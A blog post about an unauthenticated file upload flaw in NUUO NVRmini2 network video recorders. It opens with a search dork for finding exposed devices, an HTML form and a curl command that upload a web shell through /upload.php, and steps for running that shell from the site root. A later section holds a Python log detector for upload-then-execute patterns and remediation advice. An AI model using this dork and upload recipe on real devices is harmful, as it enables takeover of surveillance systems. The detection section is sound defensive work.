Sunday, 22 September 2019

NUUO NVRmini2 Arbitrary File Upload Exploit

Hey guys, back again with aincc, the most handsome one around here, muehehe. It's the middle of the night, and since I can't sleep and I'm bored, I'm scribbling on the blog again hwhwhw.

The story: I was browsing Exploit-DB, trying out the exploits there, and one of them was the NUUO NVRmini2 Arbitrary File Upload exploit.

NyamuXpl0it :
Source: https://www.exploit-db.com/exploits/44794

Dork:
intitle:NUUO Network Video Recorder Login
Vulnerability ~> /upload.php (localhost/upload.php)

Sign of a vulnerable target = blank page
Upload a shell with CSRF

<form method="POST" action="http://localhost/upload.php"
enctype="multipart/form-data">
<input type="file" name="userfile" /><button>Upload</button>
</form>

If the file uploads successfully, the name of the file you just uploaded is shown.
The file is uploaded to the site's root directory, so just replace upload.php in the URL with the name of your file.
Example: (localhost/yourshell.php)
Or it can also be executed using curl:
curl -F 'userfile=@yourfile.php' http://localhost/upload.php
Done :D
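
For defenders, the sequence above (a successful POST to /upload.php followed by a request for a new .php file in the root) leaves a recognizable trail in web access logs. The following is an added example, not part of the original post or the Exploit-DB entry: it assumes access logs in combined log format (for instance from a reverse proxy in front of the recorder), and the function name and the sample log lines are constructed for illustration.

```python
import re

# Combined log format: client, method, request target, status code.
LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+)[^"]*" (\d{3})')

# Constructed sample log using documentation addresses, not captured traffic.
SAMPLE_LOG = """\
192.0.2.10 - - [22/Sep/2019:01:02:03 +0000] "GET /login.php HTTP/1.1" 200 512
203.0.113.7 - - [22/Sep/2019:01:05:10 +0000] "POST /upload.php HTTP/1.1" 200 14
203.0.113.7 - - [22/Sep/2019:01:05:15 +0000] "GET /x9.php?a=1 HTTP/1.1" 200 40
192.0.2.10 - - [22/Sep/2019:01:06:00 +0000] "GET /x9.php HTTP/1.1" 200 40
198.51.100.4 - - [22/Sep/2019:01:07:00 +0000] "POST /upload.php HTTP/1.1" 404 0
198.51.100.4 - - [22/Sep/2019:01:07:05 +0000] "GET /index.php HTTP/1.1" 200 900
"""

def find_upload_then_exec(log_text, upload_path="/upload.php"):
    """Flag clients that POST to upload_path with a 2xx result and then fetch
    a top-level .php file that nobody had requested before that upload."""
    seen_paths = set()   # every path requested so far, by any client
    uploaders = {}       # client -> paths already known when it uploaded
    alerts = []
    for line in log_text.splitlines():
        m = LINE.match(line)
        if not m:
            continue
        client, method, target, status = m.groups()
        path = target.split("?", 1)[0]      # ignore the query string
        ok = status.startswith("2")
        if method == "POST" and path == upload_path and ok:
            uploaders[client] = set(seen_paths)
        elif (ok and client in uploaders and path.endswith(".php")
              and path.count("/") == 1 and path != upload_path
              and path not in uploaders[client]):
            alerts.append((client, path))
        seen_paths.add(path)
    return alerts

if __name__ == "__main__":
    for client, path in find_upload_then_exec(SAMPLE_LOG):
        print(f"possible web shell: {client} uploaded, then requested {path}")
```

Any hit is also a reason to check whether /upload.php is reachable without authentication at all and to compare the device firmware against the vendor's fixed release.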
